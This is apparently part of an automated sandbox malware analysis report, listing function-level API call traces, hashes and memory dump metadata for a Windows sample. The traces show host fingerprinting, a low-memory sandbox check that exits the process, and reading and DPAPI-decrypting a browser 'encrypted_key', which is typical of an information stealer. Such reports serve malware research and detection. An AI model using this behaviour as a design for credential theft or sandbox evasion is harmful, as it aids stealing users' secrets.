                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040A7E2, 0040A7F6, 0040A80C
                                                                                                                                                                                                                                                                                                                                  • pz, xrefs: 0040A8F8
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                                                                                                                                  • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;$pz
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2929475105-839208913
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f0a99ad2c3849ebe0184897b2f8ecc1e6fb3b7573bde0bd8af40db9247ebfd50
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e2f153a25b0241b5b599166127738bab9ecbab10861abf647739b816a1383ce1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0a99ad2c3849ebe0184897b2f8ecc1e6fb3b7573bde0bd8af40db9247ebfd50
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63415BB1E0A2049BC704EBA5EC55BAE37B6AB08305F44552BF505A32E0FB386954CB67
                                                                                                                                                                                                                                                                                                                                  Function 00415190 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004151CA
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00421058), ref: 004151E7
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,0079D4A8), ref: 004151FB
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,0042105C), ref: 0041520D
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                                                                                                                                                                                                                                                                  • String ID: cA
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2667927680-2872761854
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e1a0e0a3be8a57f8b73f403bacee0b7e2b900f4eba657de8b80e78309e906fdd
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: dc16e4b81abbfe3fe676fda19ddb0faac8fab1e973e0b9c2e11f24d889f851c9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1a0e0a3be8a57f8b73f403bacee0b7e2b900f4eba657de8b80e78309e906fdd
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD21C8B6E04218A7CB14FB70EC46EED333E9B94300F40455EB656561D1EE78ABC8CB95
                                                                                                                                                                                                                                                                                                                                  Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                                                                                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00401258
                                                                                                                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00401266
                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00401294
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3404098578-2766056989
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 198c605b63268064c6e3321c907f2861ebf30c0b4d659eb8408d118d522d9ff8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88014BF0D44308BAEB10DFE0DD4ABAEBB78AB14705F20849EE604B62D0D6785581875D
                                                                                                                                                                                                                                                                                                                                  Function 00411C60 Relevance: 7.9, APIs: 2, Strings: 2, Instructions: 857stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417690: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004176D2
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417690: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041770F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417793
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417690: HeapAlloc.KERNEL32(00000000), ref: 0041779A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417820: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417834
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417820: HeapAlloc.KERNEL32(00000000), ref: 0041783B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417950: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0041DEF0,000000FF,?,00411EE9,00000000,?,007A0AD0,00000000,?), ref: 00417982
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417950: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0041DEF0,000000FF,?,00411EE9,00000000,?,007A0AD0,00000000,?), ref: 00417989
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417B10: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 00417B40
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417B10: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DE8,00000000,?), ref: 00417B47
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417B10: GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 00417B54
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417B10: wsprintfA.USER32 ref: 00417B83
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417BC0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,007A0890,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417BF3
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417BC0: HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,007A0890,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417BFA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417BC0: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,007A0890,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417C0D
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417C90: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,007A0890,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417CC5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417D20: GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 00417D71
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417D20: LocalAlloc.KERNEL32(00000040,?), ref: 00417D89
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417D20: GetKeyboardLayoutList.USER32(?,00000000), ref: 00417D9D
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417D20: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417DF2
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417D20: LocalFree.KERNEL32(00000000), ref: 00417EB2
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417F10: GetSystemPowerStatus.KERNEL32(?), ref: 00417F3D
                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,?,007A0B10,00000000,?,00420E0C,00000000,?,00000000,00000000,?,007A05C0,00000000,?,00420E08,00000000), ref: 004122CE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419600: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00419614
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419600: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00419635
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419600: CloseHandle.KERNEL32(00000000), ref: 0041963F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417F90: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417FC7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417F90: HeapAlloc.KERNEL32(00000000), ref: 00417FCE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417F90: RegOpenKeyExA.KERNEL32(80000002,007998E8,00000000,00020119,?), ref: 00417FEE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417F90: RegQueryValueExA.KERNEL32(?,007A0C50,00000000,00000000,000000FF,000000FF), ref: 0041800F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417F90: RegCloseKey.ADVAPI32(?), ref: 00418022
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004180F0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00418159
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004180F0: GetLastError.KERNEL32 ref: 00418168
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418060: GetSystemInfo.KERNEL32(00420E14), ref: 00418090
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418060: wsprintfA.USER32 ref: 004180A6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418290: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,007A05F0,00000000,?,00420E14,00000000,?,00000000), ref: 004182C0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418290: HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,007A05F0,00000000,?,00420E14,00000000,?,00000000,00000000), ref: 004182C7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418290: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004182E8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418290: __aulldiv.LIBCMT ref: 00418302
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418290: __aulldiv.LIBCMT ref: 00418310
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418290: wsprintfA.USER32 ref: 0041833C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418950: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E10,00000000,?), ref: 004189BF
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418950: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E10,00000000,?), ref: 004189C6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418950: wsprintfA.USER32 ref: 004189E0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004184B0: RegOpenKeyExA.KERNEL32(00000000,0079E6F0,00000000,00020019,00000000,004205BE), ref: 00418534
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004184B0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004184B0: wsprintfA.USER32 ref: 004185E9
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004184B0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004184B0: RegCloseKey.ADVAPI32(00000000), ref: 0041861C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004184B0: RegCloseKey.ADVAPI32(00000000), ref: 00418629
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418810: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 0041885A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418810: Process32First.KERNEL32(?,00000128), ref: 0041886E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418810: Process32Next.KERNEL32(?,00000128), ref: 00418883
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418810: CloseHandle.KERNEL32(?), ref: 004188F1
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004128AB
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Heap$Process$Alloc$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$ComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
                                                                                                                                                                                                                                                                                                                                  • String ID: aA$Pz
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2204142833-3652574592
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7601005ead92fe2897fbe2dca590f551da3369833e3f91e03cab31418b7ce0b8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4f79722ab1709daed6719e9a1a5ed0a8a89ced1591e892962b9c5cf472760468
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7601005ead92fe2897fbe2dca590f551da3369833e3f91e03cab31418b7ce0b8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9872ED72D15058AACB19FB91ECA1EEE733DAF10314F5042DFB11662056EF343B98CA69
                                                                                                                                                                                                                                                                                                                                  Function 0040A430 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A2B0: memcpy.MSVCRT(?,?,?), ref: 0040A316
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A2B0: LocalFree.KERNEL32(?), ref: 0040A323
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
